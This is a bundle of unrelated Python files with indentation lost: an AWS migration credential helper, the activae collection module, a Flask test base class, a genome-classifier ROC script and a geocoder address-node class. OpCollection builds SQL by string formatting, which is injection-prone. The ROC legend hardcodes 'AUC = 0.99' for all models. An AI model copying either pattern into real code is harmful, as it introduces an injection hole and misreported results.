for sourceserver in mgn_sourceservers:
if sourceserver['isArchived'] == False:
# Check if the factory server exist in Application Migration Service
#Check if IP address is matching any on record.
if 'networkInterfaces' in sourceserver['sourceProperties']:
for interface in sourceserver['sourceProperties']['networkInterfaces']:
if interface['isPrimary'] is True:
for ips in interface['ips']:
if factoryserver['server_name'].lower().strip() == ips.lower().strip():
lsourceserver = sourceserver
break
elif factoryserver['server_fqdn'].lower().strip() == ips.lower().strip():
lsourceserver = sourceserver
break
if lsourceserver is not None:
break
if factoryserver['server_name'].lower().strip() == sourceserver['sourceProperties']['identificationHints']['hostname'].lower().strip():
lsourceserver = sourceserver
elif factoryserver['server_name'].lower().strip() == sourceserver['sourceProperties']['identificationHints']['fqdn'].lower().strip():
lsourceserver = sourceserver
elif factoryserver['server_fqdn'].lower().strip() == sourceserver['sourceProperties']['identificationHints']['hostname'].lower().strip():
lsourceserver = sourceserver
elif factoryserver['server_fqdn'].lower().strip() == sourceserver['sourceProperties']['identificationHints']['fqdn'].lower().strip():
lsourceserver = sourceserver
if lsourceserver is not None:
return lsourceserver
else:
return None
def get_details_from_secret_manager(secret_name,linux_secret_type):
# This function uses default profile to fetch the current region of the user.
region = mf_config['Region']
username = ''
password = ''
token = ''
if region == "":
print("Using interactive session")
return username, password, token
# Create a Secrets Manager client
client = boto_session.client(
service_name='secretsmanager',
region_name=region
)
try:
get_secret_value_response = client.get_secret_value(
SecretId=secret_name
)
except ClientError as e:
if e.response['Error']['Code'] == 'DecryptionFailureException':
# Secrets Manager can't decrypt the protected secret text using the provided KMS key.
# Deal with the exception here, and/or rethrow at your discretion.
print("Secrets Manager can't decrypt the protected secret text using the provided KMS key %s" % e)
raise e
elif e.response['Error']['Code'] == 'InternalServiceErrorException':
# An error occurred on the server side.
# Deal with the exception here, and/or rethrow at your discretion.
print("An error occurred on the server side %s" % e)
raise e
elif e.response['Error']['Code'] == 'InvalidParameterException':
# You provided an invalid value for a parameter.
# Deal with the exception here, and/or rethrow at your discretion.
print("An error occurred on the server side %s" % e)
raise e
elif e.response['Error']['Code'] == 'InvalidRequestException':
# You provided a parameter value that is not valid for the current state of the resource.
# Deal with the exception here, and/or rethrow at your discretion.
print("You provided an invalid value for a parameter %s" % e)
raise e
elif e.response['Error']['Code'] == 'ResourceNotFoundException':
# We can't find the resource that you asked for.
# Deal with the exception here, and/or rethrow at your discretion.
print("We can't find the resource that you asked for in Secret Manager")
else:
# Depending on whether the secret is a string or binary, one of these fields will be populated.
if 'SecretString' in get_secret_value_response:
secret = json.loads(get_secret_value_response['SecretString'])
if (linux_secret_type == "password") or (linux_secret_type == ""):
if 'username' in secret:
username = secret["username"]
if 'password' in secret:
password = secret["password"]
elif linux_secret_type == "pemkey":
# IN this case, create a temporary pem file and return the pem file name
if 'secret_key' in secret:
username = secret["secret_key"]
if 'secret_value' in secret:
password = create_temp_pem_file(secret["secret_value"])
return username, password
def create_temp_pem_file(secret_value):
temp_pem_file_name = "migrationsource_temp_"+str(ts)+".pem"
with open(temp_pem_file_name, 'w') as f:
f.write(base64.b64decode(secret_value).decode("utf-8"))
return temp_pem_file_name |
<reponame>helix84/activae
# -*- coding: utf-8 -*-
# Copyright (C) 2010 CENATIC: Centro Nacional de Referencia de
# Aplicacion de las TIC basadas en Fuentes Abiertas, Spain.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# Neither the name of the CENATIC nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# You may contact the copyright holder at: Fundacion CENATIC, Edificio
# de Servicios Sociales: C/ Vistahermosa, 1, 3ra planta, 06200
# Almendralejo (Badajoz), Spain
import os
import Asset
import OpAsset
import Collection
from ACL import ACL
from DBSlayer import query_check_success, Query
class OpCollection:
def __init__ (self, collection = None, debug_params = None):
self.params = debug_params
if isinstance (collection,Collection.Collection):
self._collection = collection
elif collection == None or type(collection) == int:
self._collection = Collection.Collection(collection)
else:
raise TypeError
def __update_assets (self, changes):
"""Update collections_id for all (asset_id,col_id) pairs specified."""
reversions = []
for asset_id, col_id in changes:
a = Asset.Asset (asset_id)
old_col_id = a['collections_id']
a['collections_id'] = col_id
oa = OpAsset.OpAsset(a)
ok = oa.update()
if ok:
reversions.append((asset_id, old_col_id))
else:
self.__revert_assets (reversions)
return False
return True
def __revert_assets (self, changes):
"""Undo changes to the assets."""
for asset_id, col_id in changes:
a = Asset.Asset (asset_id)
a['collections_id'] = col_id
oa = OpAsset.OpAsset(a)
ok = oa.update()
def add (self):
"""Feed collection to platform"""
sql_columns = []
sql_values = []
for key in ['name', 'creator_id']:
if self._collection[key]:
sql_columns.append(key)
sql_values.append("'%s'" % self._collection[key])
q = "INSERT INTO collections (%s) VALUES (%s);" \
% (','.join(sql_columns), ','.join(sql_values))
query = Query(q)
try:
self._collection['id'] = query.result[0]['INSERT_ID']
except KeyError:
return False
changes = [(x,self._collection['id'])
for x in self._collection['assets']]
ok = self.__update_assets (changes)
if ok:
acl = ACL(self.params)
acl.set_default_collection_acl(self._collection)
return True
q = "DELETE FROM collections WHERE id = %s;" %\
(self._collection['id'])
query = Query(q)
return False
def update (self):
"""Update a collection"""
col_id = self._collection['id']
q = "UPDATE collections SET name = '%s' "\
"WHERE id = %s;" % (self._collection['name'], col_id)
if not query_check_success (q):
return False
old_assets = Collection.Collection(col_id)['assets']
new_assets = self._collection['assets']
mod_assets = [x for x in old_assets if x not in new_assets]
changes = [(x, col_id) for x in new_assets]
changes += [(x, None) for x in mod_assets]
ok = self.__update_assets (changes)
if not ok:
return False
return True
def delete (self):
"""Delete the collection and all its assets (or their
attachments if deletion is not possible."""
changes = []
for asset_id in self._collection['assets']:
a = Asset.Asset (asset_id)
oa = OpAsset.OpAsset(a)
ret = oa.delete()
if ret['type'] == 'partial' and ret['ret'] == True:
changes.append((asset_id, None))
if ret['ret'] == False:
self.__update_assets (changes)
return False
q = "DELETE FROM collections WHERE id = '%s';" % self._collection['id']
if not query_check_success (q):
return False
return True
def test():
import sys
import OpLookup
import Auth
import Role
try:
username = sys.argv[1]
asset_id = int (sys.argv[2])
asset = Asset.Asset (asset_id)
user = Auth.get_user(username)
roles = Role.get_user_roles (username)
params = { 'roles': roles, 'user_id': user['id']}
except IndexError:
print 'Required test parameters: user sample_asset_id'
sys.exit(1)
# Create asset for testing
new_asset = Asset.Asset ()
new_asset._db = asset._db
new_asset._tags = asset._tags
flag = id (new_asset)
new_asset['title'] = flag
oa = OpAsset.OpAsset (new_asset, params)
ret = oa.add()
assert ret == True
print '#1 OpCollection: Creation of test asset OK'
ol = OpLookup.OpLookup ()
new_asset_id = ol({'title': flag})[0]
new_asset = Asset.Asset (new_asset_id)
oa = OpAsset.OpAsset (new_asset, params)
assert oa and int(new_asset['title']) == int(flag)
print '#2 OpCollection: Retrieval of test asset OK'
test = Collection.Collection ()
flag = str(id(test))
test._db['name'] = flag
test._db['creator_id'] = user['id']
test['assets'] = [new_asset['id']]
oc = OpCollection (test, debug_params = params)
assert oc
print '#3 OpCollection (%d): OK' % test['id']
ret = oc.add()
assert ret == True
print '#4 OpCollection.add (): OK'
new = Collection.Collection (name_collection = test['name'])
oc = OpCollection (new, debug_params = params)
assert new['name'] == test['name']
print '#5 OpCollection (%d): Retrieval after creation OK' % new['id']
new['name'] = flag*2
ret = oc.update()
assert ret == True
print '#6 OpCollection.update (): Modification OK'
new = Collection.Collection (name_collection = new['name'])
oc = OpCollection (new, debug_params=params)
assert new['name'] == flag*2
print '#7 OpCollection (%d): Retrieval after modification OK' % new['id']
ret = oc.delete()
assert ret == True
print '#8 OpCollection.delete(): Deletion OK'
if __name__ == '__main__':
test()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019-06-06 14:36
# @Author : Vassago
# @File : common.py
# @Software: PyCharm
import json
import logging
from unittest import TestCase
from app.config import base_config
from app.app_runner import create_app as _create_app
LOG = logging.getLogger(__name__)
class BaseTestCase(TestCase):
def get_before_run_test_app(self):
if not hasattr(self, 'app') or not self.app:
self.app = _create_app()
return self.app
def create_test_app(self):
# config.get_config('TEST')
# LOG.info("database use:%s", config.DATABASE_URL)
# if "test" not in config.DATABASE_URL:
# LOG.error("please use a db name like 'test_xxx' ,because the testcase will clean the database")
# raise Exception(gettext("database name error"))
# if database_exists(config.DATABASE_URL):
# drop_database(config.DATABASE_URL)
# create_database(config.DATABASE_URL)
self.get_before_run_test_app()
self.app.config['JSONIFY_PRETTYPRINT_REGULAR'] = False
self.app_client = self.app.test_client()
self.headers = {'content_type': 'application/json'}
def get(self, url, data=None, headers=None, check_status=True, query_string=None):
result_headers = {}
if not headers:
headers = {}
result_headers.update(self.headers)
result_headers.update(headers)
rv = self.app_client.get(url, data=data, headers=result_headers, query_string=query_string)
# LOG.info("get user info %s", json.loads(rv.data))
if rv.status_code != 404 and rv.status_code >= 400:
LOG.error("request error %s", json.loads(rv.data))
if check_status:
raise self.failureException("http error: {}".format(rv.data))
return rv.status_code, json.loads(rv.data)
def post(self, url, data=None, headers=None, check_status=True):
result_headers = {}
if not headers:
headers = {}
result_headers.update(self.headers)
result_headers.update(headers)
if data:
data = json.dumps(data)
else:
data = {}
rv = self.app_client.post(url, data=data, follow_redirects=True, content_type='application/json',
headers=result_headers)
# LOG.info("get user info %s", json.loads(rv.data))
if rv.status_code >= 400:
LOG.error("request error %s", json.loads(rv.data))
if check_status:
raise self.failureException("http error: {}".format(rv.data))
return rv.status_code, json.loads(rv.data)
def patch(self, url, data=None, headers=None, check_status=True):
result_headers = {}
if not headers:
headers = {}
result_headers.update(self.headers)
result_headers.update(headers)
rv = self.app_client.patch(url, data=json.dumps(data), follow_redirects=True, content_type='application/json',
headers=result_headers)
if rv.status_code != 404 and rv.status_code >= 400:
LOG.error("request error %s", json.loads(rv.data))
if check_status:
raise self.failureException("http error: {}".format(rv.data))
return rv.status_code, json.loads(rv.data)
def put(self, url, data=None, headers=None, check_status=True):
result_headers = {}
if not headers:
headers = {}
result_headers.update(self.headers)
result_headers.update(headers)
rv = self.app_client.put(url, data=json.dumps(data), follow_redirects=True, content_type='application/json',
headers=result_headers)
# LOG.info("get user info %s", json.loads(rv.data))
if rv.status_code != 404 and rv.status_code >= 400:
LOG.error("request error %s", json.loads(rv.data))
if check_status:
raise self.failureException("http error: {}".format(rv.data))
return rv.status_code, json.loads(rv.data)
def delete(self, url, headers=None, check_status=True):
result_headers = {}
if not headers:
headers = {}
result_headers.update(self.headers)
result_headers.update(headers)
rv = self.app_client.delete(url, follow_redirects=True, content_type='application/json', headers=result_headers)
# LOG.info("get user info %s", json.loads(rv.data))
json_data = None
if rv.status_code != 404 and rv.status_code >= 400:
LOG.error("request error %s", json.loads(rv.data))
if check_status:
raise self.failureException("http error: {}".format(rv.data))
if rv.data:
json_data = json.loads(rv.data)
return rv.status_code, json_data
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Author: <NAME>
Email: <EMAIL>
ROC curve and AUC for Neurochaos Learning, SVM and Random Forest
"""
import os
import numpy as np
from sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay
import matplotlib.pyplot as plt
from pretty_confusion_matrix import pp_matrix_from_data
DATA_NAME = ['Sars_cov_2.genomes' , 'Coronaviridae.genomes', 'Metapneumovirus.genomes', 'Rhinovirus.genomes', 'Influenza.genomes' ]
label_list = ['class-0', 'class-1', 'class-2', 'class-3', 'class-4' ]
classification_type = 'five_class'
path = os.getcwd()
general_result_path = []
result_path_nl = path + '/NEUROCHAOS-RESULTS/' + classification_type + '/CROSS_VALIDATION/'
result_path_svm = path + '/SA-TUNING/RESULTS/SVM/'
result_path_rf = path + '/SA-TUNING/RESULTS/RANDOM_FOREST/'
general_result_path.append(result_path_nl)
general_result_path.append(result_path_svm)
general_result_path.append(result_path_rf)
AUC_FINAL_MICRO = []
TPR_FINAL_MICRO = []
FPR_FINAL_MICRO = []
for num_len in range(0, len(general_result_path)):
true_test_label = np.load(general_result_path[num_len] + 'true_test_label.npy')
pred_test_label = np.load(general_result_path[num_len] + 'pred_test_label.npy')
pp_matrix_from_data(true_test_label, pred_test_label )
cm = confusion_matrix(true_test_label, pred_test_label )
disp = ConfusionMatrixDisplay(confusion_matrix=cm, display_labels=label_list)
disp.plot()
plt.tight_layout()
# plt.savefig(result_path+"loocv_cm_chaosfex_svm.jpg", format='jpg', dpi=300)
# plt.savefig(result_path+"loocv_cm_chaosfex_svm.eps", format='eps', dpi=300)
## ROC Curve
from sklearn.metrics import roc_curve, auc
from sklearn.metrics import roc_auc_score
from sklearn.preprocessing import label_binarize
y_score_mat = np.load(general_result_path[num_len]+ 'y_score_mat.npy')
y_test = label_binarize(true_test_label, classes=[0, 1, 2, 3, 4])
n_classes = y_test.shape[1]
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score_mat[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(y_test.ravel(), y_score_mat.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
TPR_FINAL_MICRO.append(tpr["micro"])
FPR_FINAL_MICRO.append(fpr["micro"])
AUC_FINAL_MICRO.append(roc_auc["micro"])
import matplotlib.pyplot as plt
plt.figure(figsize=(15, 10))
lw = 3
plt.plot(FPR_FINAL_MICRO[0], TPR_FINAL_MICRO[0], color="red", lw=lw, label="ROC curve for NL (AUC = %0.2f)" % 0.99 ,)
plt.plot(FPR_FINAL_MICRO[1], TPR_FINAL_MICRO[1], color="blue", lw=lw, label="ROC curve for SVM (AUC = %0.2f)" % 0.99 ,)
plt.plot(FPR_FINAL_MICRO[2], TPR_FINAL_MICRO[2], color="green", lw=lw, label="ROC curve for RF (AUC = %0.2f)" % 0.99 ,)
plt.plot([0, 1], [0, 1], color="navy", lw=lw, linestyle="--")
plt.xlim([-0.05, 1.0])
plt.ylim([0.0, 1.05])
plt.xticks(fontsize=45)
plt.yticks(fontsize=45)
plt.xlabel("False Positive Rate", fontsize = 40)
plt.ylabel("True Positive Rate", fontsize = 40)
# plt.title("Receiver operating characteristic example")
plt.legend(loc="lower right",fontsize=30)
plt.grid(True)
plt.tight_layout()
plt.savefig(result_path_nl+"roc_final_multiclass.jpg", format='jpg', dpi=300)
plt.savefig(result_path_nl+"roc_final_multiclass.eps", format='eps', dpi=300)
plt.show()
# Classification Metrics
from sklearn.metrics import classification_report
print(classification_report(true_test_label, pred_test_label , target_names=label_list))
from sklearn.metrics import precision_score
precision = precision_score(true_test_label, pred_test_label, average='macro')
from sklearn.metrics import recall_score
recall = recall_score(true_test_label, pred_test_label, average='macro')
from sklearn.metrics import f1_score
fscore = f1_score(true_test_label, pred_test_label, average='macro')
print("Precision = ", precision)
print("Recall = ", recall)
print("F1-score = ", fscore)
|
<reponame>t-sagara/jageocoder
from functools import lru_cache
import logging
import re
from typing import List, Optional, Union
from sqlalchemy import Column, ForeignKey, Integer, Float, String, Text
from sqlalchemy import or_
from sqlalchemy.orm import deferred
from sqlalchemy.orm import backref, relationship
from jageocoder.address import AddressLevel
from jageocoder.base import Base
from jageocoder.itaiji import converter as itaiji_converter
from jageocoder.result import Result
from jageocoder.strlib import strlib
logger = logging.getLogger(__name__)
class AddressNode(Base):
"""
The address-node structure stored in 'node' table.
Attributes
----------
id : int
The key identifier that is automatically sequentially numbered.
name : str
The name of the address element, such as '東京都' or '新宿区'
name_index : str
The standardized string for indexing created from its name.
x : float
X-coordinate value. (Longitude)
y : float
Y-coordinate value. (Latitude)
level : int
The level of the address element.
The meaning of each value is as follows.
note : string
Note or comment.
parent_id : int
The id of the parent node.
children : list of AddressNode
The child nodes.
"""
__tablename__ = 'node'
id = Column(Integer, primary_key=True)
name = deferred(Column(String(256), nullable=False))
name_index = Column(String(256), nullable=False)
x = deferred(Column(Float, nullable=True))
y = deferred(Column(Float, nullable=True))
level = Column(Integer, nullable=True)
note = deferred(Column(Text, nullable=True))
parent_id = Column(Integer, ForeignKey('node.id'), nullable=True)
children = relationship(
"AddressNode",
cascade="all",
backref=backref("parent", remote_side="AddressNode.id"),
lazy="dynamic",
)
def __init__(self, *args, **kwargs):
"""
The initializer of the node.
In addition to the initialization of the record,
the name_index is also created.
"""
super().__init__(*args, **kwargs)
# Basic attributes
self.name = kwargs.get('name', '')
# Set extended attributes
self.set_attributes(**kwargs)
# For indexing
self.name_index = itaiji_converter.standardize(self.name)
# Relations
self.parent_id = kwargs.get('parent_id', None)
def set_attributes(self, **kwargs):
"""
Set attributes of this node by kwargs values.
'name' can't be modified.
"""
self.x = kwargs.get('x', kwargs.get('lon'))
self.y = kwargs.get('y', kwargs.get('lat'))
self.level = kwargs.get('level')
self.note = kwargs.get('note', None)
def add_child(self, child):
"""
Add a node as a child of this node.
Parameter
---------
child : AddressNode
The node that will be a child node.
"""
self.children.append(child)
def add_to_parent(self, parent):
"""
Add this node as a child of an other node.
Parameter
---------
parent : AddressNode
The node that will be the parent.
"""
self.parent = parent
def get_child(self, target_name):
"""
Get a child node with the specified name.
Parameter
---------
target_name : str
The name (or standardized name) of the target node.
Return
------
Returns the relevand node if it is found,
or None if it is not.
"""
return self.children.filter(or_(
AddressNode.name == target_name,
AddressNode.name_index == target_name
)).one_or_none()
@lru_cache(maxsize=512)
def search_child_with_criteria(self, pattern: str,
max_level: Optional[int] = None):
conds = []
conds.append(AddressNode.name_index.like(pattern))
logger.debug(" conds: name_index LIKE '{}'".format(pattern))
if max_level is not None:
conds.append(AddressNode.level <= max_level)
logger.debug(" and level <= {}".format(max_level))
filtered_children = self.children.filter(*conds).order_by(
AddressNode.id)
return filtered_children
def search_recursive(
self, index: str,
processed_nodes: Optional[List['AddressNode']] = None,
aza_skip: Union[str, bool, None] = None) -> List[Result]:
"""
Search nodes recursively that match the specified address notation.
Parameter
---------
index : str
The standardized address notation.
processed_nodes: List of AddressNode, optional
List of nodes that have already been processed
by TRIE search results
aza_skip: str, bool, optional
Specifies how to skip aza-names.
- Set to 'auto' or None to make the decision automatically
- Set to 'off' or False to not skip
- Set to 'on' or True to always skip
Return
------
A list of relevant AddressNode.
"""
l_optional_prefix = itaiji_converter.check_optional_prefixes(index)
optional_prefix = index[0: l_optional_prefix]
index = index[l_optional_prefix:]
if aza_skip in (None, ''):
aza_skip = 'auto'
elif aza_skip in (True, 'enable'):
aza_skip = 'on'
elif aza_skip in (False, 'disable'):
aza_skip = 'off'
logger.debug("node:{}, index:{}, optional_prefix:{}".format(
self, index, optional_prefix))
if len(index) == 0:
return [Result(self, optional_prefix, 0)]
max_level = None
v = strlib.get_number(index)
if v['i'] > 0:
# If it starts with a number,
# look for a node that matches the numeric part exactly.
substr = '{}.%'.format(v['n'])
else:
# If it starts with not a number,
# look for a node with a maching first letter.
substr = index[0:1] + '%'
if '字' in optional_prefix:
max_level = AddressLevel.AZA
filtered_children = self.search_child_with_criteria(
pattern=substr, max_level=max_level)
# Check if the index begins with an extra character of
# the current node.
if filtered_children.count() == 0 and \
index[0] in itaiji_converter.extra_characters:
logger.debug("Beginning with an extra character: {}".format(
index[0]))
candidates = self.search_recursive(
index[1:], processed_nodes, aza_skip)
if len(candidates) > 0:
new_candidates = []
for candidate in candidates:
new_candidate = Result(
candidate.node,
index[0] + candidate.matched,
l_optional_prefix + candidate.nchars)
new_candidates.append(new_candidate)
return new_candidates
return []
if logger.isEnabledFor(logging.DEBUG):
msg = 'No candidates. Children are; {}'.format(
','.join([x.name for x in self.children]))
logger.debug(msg)
candidates = []
for child in filtered_children:
if child in processed_nodes or []:
logger.debug("-> skipped; {}({})".format(
child.name, child.id))
continue
logger.debug("-> comparing; {}".format(child.name_index))
new_candidates = self._get_candidates_from_child(
child=child,
index=index,
optional_prefix=optional_prefix,
processed_nodes=processed_nodes,
aza_skip=aza_skip)
if len(new_candidates) > 0:
candidates += new_candidates
if self.level == AddressLevel.WARD and self.parent.name == '京都市':
# Street name (通り名) support in Kyoto City
# If a matching part of the search string is found in the
# child nodes, the part before the name is skipped
# as a street name.
for child in self.children:
pos = index.find(child.name_index)
if pos > 0:
offset = pos + len(child.name_index)
rest_index = index[offset:]
logger.debug(
"child:{} match {} chars".format(child, offset))
for cand in child.search_recursive(
rest_index,
processed_nodes, aza_skip):
candidates.append(
Result(cand[0],
optional_prefix +
index[0: offset] + cand[1],
l_optional_prefix +
len(child.name_index) + len(cand[1])
))
# Search for subnodes with queries excludes Aza-name candidates
if aza_skip == 'on' or \
(aza_skip == 'auto' and
self._is_aza_omission_target(processed_nodes)):
msg = "Checking Aza-name, current_node:{}, processed:{}"
logger.debug(msg.format(self, processed_nodes))
aza_positions = itaiji_converter.optional_aza_len(
index, 0)
if len(aza_positions) > 0:
for azalen in aza_positions:
msg = '"{}" in index "{}" can be optional.'
logger.debug(msg.format(index[:azalen], index))
# Note: Disable 'aza_skip' here not to perform
# repeated skip processing.
sub_candidates = self.search_recursive(
index[azalen:],
processed_nodes, aza_skip='off')
if sub_candidates[0].matched == '':
continue
for cand in sub_candidates:
if cand.node.level < AddressLevel.BLOCK and \
cand.node.name_index not in \
itaiji_converter.chiban_heads:
logger.debug("{} is ignored".format(
cand.node.name))
continue
candidates.append(Result(
cand.node,
optional_prefix +
index[0:azalen] + cand.matched,
l_optional_prefix + cand.nchars))
if len(candidates) == 0:
candidates = [Result(self, '', 0)]
logger.debug("node:{} returns {}".format(self.name, candidates))
return candidates
def _get_candidates_from_child(
self, child: 'AddressNode',
index: str, optional_prefix: str,
processed_nodes: List['AddressNode'],
aza_skip: str) -> list:
"""
Get candidates from the child.
Parameters
----------
child: AddressNode
The starting child node.
index: str
Standardized query string. Numeric characters are kept as
original notation.
optional_prefix: str
The option string that preceded the string passed by index.
aza_skip: str
Specifies how to skip aza-names.
Options are 'auto', 'off', and 'on'
Returns
-------
list
The list of candidates.
Each element of the array has the matched AddressNode
as the first element and the matched string
as the second element.
"""
match_len = itaiji_converter.match_len(index, child.name_index)
if match_len == 0:
l_optional_postfix = itaiji_converter.check_optional_postfixes(
child.name_index, child.level)
if l_optional_postfix > 0:
# In case the index string of the child node with optional
# postfixes removed is completely included in the beginning
# of the search string.
# ex. index='2.-8.', child.name_index='2.番' ('番' is a postfix)
optional_postfix = child.name_index[-l_optional_postfix:]
alt_child_index = child.name_index[0: -l_optional_postfix]
logger.debug(
"child:{} has optional postfix {}".format(
child, optional_postfix))
match_len = itaiji_converter.match_len(
index, alt_child_index, removed_postfix=optional_postfix)
if match_len < len(index) and index[match_len] in '-ノ':
match_len += 1
if match_len == 0 and child.name_index.endswith('.条'):
# Support for Sapporo City and other cities that use
# "北3西1" instead of "北3条西1丁目".
alt_child_index = child.name_index.replace('条', '', 1)
logger.debug("child:{} ends with '.条'".format(child))
match_len = itaiji_converter.match_len(index, alt_child_index)
if match_len == 0:
logger.debug("{} doesn't match".format(child.name))
return []
candidates = []
offset = match_len
rest_index = index[offset:]
l_optional_prefix = len(optional_prefix)
logger.debug("child:{} match {} chars".format(child, offset))
for cand in child.search_recursive(
index=rest_index,
processed_nodes=processed_nodes,
aza_skip=aza_skip):
candidates.append(Result(
cand.node,
optional_prefix + index[0:match_len] + cand.matched,
l_optional_prefix + match_len + cand.nchars))
return candidates
def _is_aza_omission_target(
self, processed_nodes: List['AddressNode']) -> bool:
"""
Determine if this node is a target of aza-name omission.
Parameters
----------
processed_nodes: List of AddressNode
List of nodes that have already been processed
by TRIE search results
Returns
-------
bool
True if this node is a target of aza-name ommission.
Otherwise False.
Notes
-----
Sibling and parent nodes of nodes whose names match in TRIE
should not look for nodes that omit the aza-names.
"""
if self.level < AddressLevel.CITY or \
self.level > AddressLevel.AZA:
return False
for node in processed_nodes or []:
if node.parent_id == self.parent_id:
logger.debug("A sibling node {} had been selected".format(
node.name))
return False
elif node.parent_id == self.id:
logger.debug("A child node {} had been selected".format(
node.name))
return False
if self.level in (AddressLevel.CITY, AddressLevel.WARD):
return True
aza_children = self.children.filter(
AddressNode.level <= AddressLevel.AZA)
for child in aza_children:
if child.name_index not in itaiji_converter.chiban_heads:
logger.debug(("The child-node {} is higher than Aza "
"(can't skip aza-names)").format(child.name))
return False
return True
def save_recursive(self, session):
"""
Add the node to the database recursively.
Parameters
----------
session : sqlalchemy.orm.Session
The database session for executing SQL queries.
"""
session.add(self)
for c in self.children:
c.save_recursive(session)
def as_dict(self):
"""
Return the dict notation of the node.
"""
return {
"id": self.id,
"name": self.name,
"x": self.x,
"y": self.y,
"level": self.level,
"note": self.note,
"fullname": self.get_fullname(),
}
def get_fullname(self):
"""
Returns a complete address notation starting with the name of
the prefecture.
"""
names = []
cur_node = self
while cur_node.parent:
names.insert(0, cur_node.name)
cur_node = cur_node.parent
return names
def get_parent_list(self):
"""
Returns a complete node list starting with the prefecture.
"""
nodes = []
cur_node = self
while cur_node.parent:
nodes.insert(0, cur_node)
cur_node = cur_node.parent
return nodes
def get_nodes_by_level(self):
"""
The function returns an array of this node and its upper nodes.
The Nth node of the array contains the node corresponding
to address level N.
If there is no element corresponding to level N, None is stored.
Example
-------
>>> import jageocoder
>>> jageocoder.init()
>>> node = jageocoder.searchNode('多摩市落合1-15')[0][0]
>>> [str(x) for x in node.get_node_array_by_level()]
['None', '[11460206:東京都(139.69164,35.6895)1(jisx0401:13)]', 'None', '[12063501:多摩市(139.446366,35.636959)3(jisx0402:13224)]', 'None',
'[12065382:落合(139.427097,35.624877)5(None)]', '[12065383:一丁目(139.427097,35.624877)6(None)]', '[12065389:15番地(139.428969,35.625779)7(None)]']
"""
result = [None] * (self.level + 1)
cur_node = self
while cur_node.parent:
result[cur_node.level] = cur_node
cur_node = cur_node.parent
return result
def __str__(self):
return '[{}:{}({},{}){}({})]'.format(
self.id, self.name, self.x, self.y, self.level, str(self.note))
def __repr__(self):
r = []
cur_node = self
while cur_node.parent:
r.insert(0, str(cur_node))
cur_node = cur_node.parent
return '>'.join(r)
def retrieve_upper_node(self, target_levels: List[int]):
"""
Retrieves the node at the specified level from
the this node or one of its upper nodes.
"""
cur_node = self
while cur_node.parent and cur_node.level not in target_levels:
parent = cur_node.parent
cur_node = parent
if cur_node.level in target_levels:
return cur_node
return None
def get_pref_name(self) -> str:
"""
Returns the name of prefecture that contains this node.
"""
node = self.retrieve_upper_node([AddressLevel.PREF])
if node is None:
return ''
return node.name
def get_pref_jiscode(self) -> str:
"""
Returns the jisx0401 code of the prefecture that
contains this node.
"""
node = self.retrieve_upper_node([AddressLevel.PREF])
if node is None or node.note is None:
return ''
m = re.search(r'jisx0401:(\d{2})', node.note)
if m:
return m.group(1)
return ''
def get_pref_local_authority_code(self) -> str:
"""
Returns the 地方公共団体コード of the prefecture that
contains this node.
"""
jisx0401 = self.get_pref_jiscode()
if jisx0401 == '':
return ''
return self._local_authority_code(jisx0401 + '000')
def get_city_name(self) -> str:
"""
Returns the name of city that contains this node.
"""
node = self.retrieve_upper_node([
AddressLevel.CITY, AddressLevel.WARD])
if node is None:
return ''
return node.name
def get_city_jiscode(self) -> str:
"""
Returns the jisx0402 code of the city that
contains this node.
"""
node = self.retrieve_upper_node([
AddressLevel.CITY, AddressLevel.WARD])
if node is None or node.note is None:
return ''
m = re.search(r'jisx0402:(\d{5})', node.note)
if m:
return m.group(1)
return ''
def get_city_local_authority_code(self) -> str:
"""
Returns the 地方公共団体コード of the city that
contains this node.
"""
jisx0402 = self.get_city_jiscode()
if jisx0402 == '':
return ''
return self._local_authority_code(jisx0402)
def _local_authority_code(self, orig_code: str) -> str:
"""
Returns the 6-digit code, adding a check digit to the JIS code.
https://www.soumu.go.jp/main_content/000137948.pdf
"""
if len(orig_code) != 5:
raise RuntimeError('The original code must be a 5-digit string.')
sum = int(orig_code[0]) * 6 + int(orig_code[1]) * 5 +\
int(orig_code[2]) * 4 + int(orig_code[3]) * 3 +\
int(orig_code[4]) * 2
if sum < 11:
checkdigit = str(11 - sum)
else:
remainder = sum % 11
checkdigit = str(11 - remainder)[-1]
return orig_code + checkdigit
def get_postcode(self) -> str:
"""
Returns the 7digit postcode of the oaza that
contains this node.
"""
node = self
while True:
if node.level <= AddressLevel.COUNTY:
return ''
if node.note:
break
node = node.parent
m = re.search(r'postcode:(\d{7})', node.note)
if m:
return m.group(1)
return ''
def get_gsimap_link(self) -> str:
"""
Returns the URL for GSI Map with parameters.
